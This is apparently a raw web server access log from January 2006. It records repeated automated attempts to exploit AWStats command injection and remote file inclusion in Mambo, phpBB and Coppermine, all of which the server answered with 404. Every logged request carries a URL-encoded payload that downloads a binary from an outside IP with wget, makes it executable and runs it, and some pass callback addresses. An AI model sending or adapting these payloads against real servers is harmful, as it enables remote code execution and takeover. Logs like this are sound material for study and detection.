195.74.109.37 - - [04/Jan/2006:06:13:40 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.74.109.37 - - [04/Jan/2006:06:13:41 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.74.109.37 - - [04/Jan/2006:06:13:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

195.223.166.68 - - [04/Jan/2006:12:06:26 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.223.166.68 - - [04/Jan/2006:12:06:28 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.223.166.68 - - [04/Jan/2006:12:06:29 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

80.118.243.115 - - [05/Jan/2006:14:04:08 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

80.118.243.115 - - [05/Jan/2006:14:04:10 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

80.118.243.115 - - [05/Jan/2006:14:04:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

132.248.204.65 - - [05/Jan/2006:18:16:38 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 270

132.248.204.65 - - [05/Jan/2006:18:16:39 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 269

132.248.204.65 - - [05/Jan/2006:18:16:40 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 276

132.248.204.65 - - [05/Jan/2006:18:16:41 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 274

132.248.204.65 - - [05/Jan/2006:18:16:42 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 280

132.248.204.65 - - [05/Jan/2006:18:16:43 -0800] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 280

209.20.37.196 - - [06/Jan/2006:00:24:59 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.20.37.196 - - [06/Jan/2006:00:25:00 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.20.37.196 - - [06/Jan/2006:00:25:01 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

209.20.37.196 - - [06/Jan/2006:00:25:02 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

209.20.37.196 - - [06/Jan/2006:00:25:03 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

209.20.37.196 - - [06/Jan/2006:00:25:05 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

209.20.37.196 - - [06/Jan/2006:00:25:06 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

203.197.246.6 - - [06/Jan/2006:09:18:39 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

203.197.246.6 - - [06/Jan/2006:09:18:40 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

203.197.246.6 - - [06/Jan/2006:09:18:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.188.21.87 - - [08/Jan/2006:09:27:13 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

218.188.21.87 - - [08/Jan/2006:09:27:14 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

218.188.21.87 - - [08/Jan/2006:09:27:16 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

150.164.65.10 - - [08/Jan/2006:18:49:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

150.164.65.10 - - [08/Jan/2006:18:49:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

150.164.65.10 - - [08/Jan/2006:18:49:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

216.68.232.25 - - [09/Jan/2006:00:37:51 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.68.232.25 - - [09/Jan/2006:00:37:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.68.232.25 - - [09/Jan/2006:00:37:53 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

61.81.166.92 - - [09/Jan/2006:02:39:09 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

61.81.166.92 - - [09/Jan/2006:02:39:10 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

61.81.166.92 - - [09/Jan/2006:02:39:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

203.158.54.63 - - [09/Jan/2006:03:58:29 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

203.158.54.63 - - [09/Jan/2006:03:58:31 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

203.158.54.63 - - [09/Jan/2006:03:58:32 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

65.125.52.66 - - [09/Jan/2006:05:38:48 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.125.52.66 - - [09/Jan/2006:05:38:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.125.52.66 - - [09/Jan/2006:05:38:50 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

69.28.238.138 - - [09/Jan/2006:12:19:09 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

69.28.238.138 - - [09/Jan/2006:12:19:10 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

69.28.238.138 - - [09/Jan/2006:12:19:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.75.53.66 - - [09/Jan/2006:20:37:12 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

218.75.53.66 - - [09/Jan/2006:20:37:14 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

218.75.53.66 - - [09/Jan/2006:20:37:15 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

218.75.53.66 - - [09/Jan/2006:20:37:16 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

218.75.53.66 - - [09/Jan/2006:20:37:19 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

218.75.53.66 - - [09/Jan/2006:20:37:19 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

218.75.53.66 - - [09/Jan/2006:20:37:21 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

218.75.53.66 - - [09/Jan/2006:20:37:22 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

212.68.203.234 - - [10/Jan/2006:04:31:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.68.203.234 - - [10/Jan/2006:04:31:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.68.203.234 - - [10/Jan/2006:04:31:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

85.37.240.241 - - [10/Jan/2006:07:37:20 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 297

85.37.240.241 - - [10/Jan/2006:07:37:25 -0800] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 313

85.37.240.241 - - [10/Jan/2006:07:37:26 -0800] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 292

85.37.240.241 - - [10/Jan/2006:07:37:28 -0800] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 289

85.37.240.241 - - [10/Jan/2006:07:37:29 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 303

85.37.240.241 - - [10/Jan/2006:07:37:30 -0800] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 312

24.34.78.105 - - [14/Jan/2006:19:23:11 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

24.34.78.105 - - [14/Jan/2006:19:23:12 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

24.34.78.105 - - [14/Jan/2006:19:23:14 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

24.34.78.105 - - [14/Jan/2006:19:23:19 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

61.66.208.16 - - [15/Jan/2006:02:35:04 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 270

61.66.208.16 - - [15/Jan/2006:02:35:05 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 269

61.66.208.16 - - [15/Jan/2006:02:35:06 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 276

61.66.208.16 - - [15/Jan/2006:02:35:08 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 274

209.206.228.15 - - [15/Jan/2006:06:09:22 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.206.228.15 - - [15/Jan/2006:06:09:23 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.206.228.15 - - [15/Jan/2006:06:09:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

69.56.211.202 - - [15/Jan/2006:07:19:32 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

69.56.211.202 - - [15/Jan/2006:07:19:33 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

69.56.211.202 - - [15/Jan/2006:07:19:34 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

218.49.183.193 - - [15/Jan/2006:09:31:01 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 278

218.49.183.193 - - [15/Jan/2006:09:31:02 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 278

218.49.183.193 - - [15/Jan/2006:09:31:04 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 286

82.124.239.127 - - [15/Jan/2006:12:26:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.124.239.127 - - [15/Jan/2006:12:26:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.124.239.127 - - [15/Jan/2006:12:26:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

82.165.238.34 - - [16/Jan/2006:00:25:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.165.238.34 - - [16/Jan/2006:00:25:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.165.238.34 - - [16/Jan/2006:00:25:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

67.158.29.194 - - [16/Jan/2006:02:12:55 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

67.158.29.194 - - [16/Jan/2006:02:12:56 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

67.158.29.194 - - [16/Jan/2006:02:12:57 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

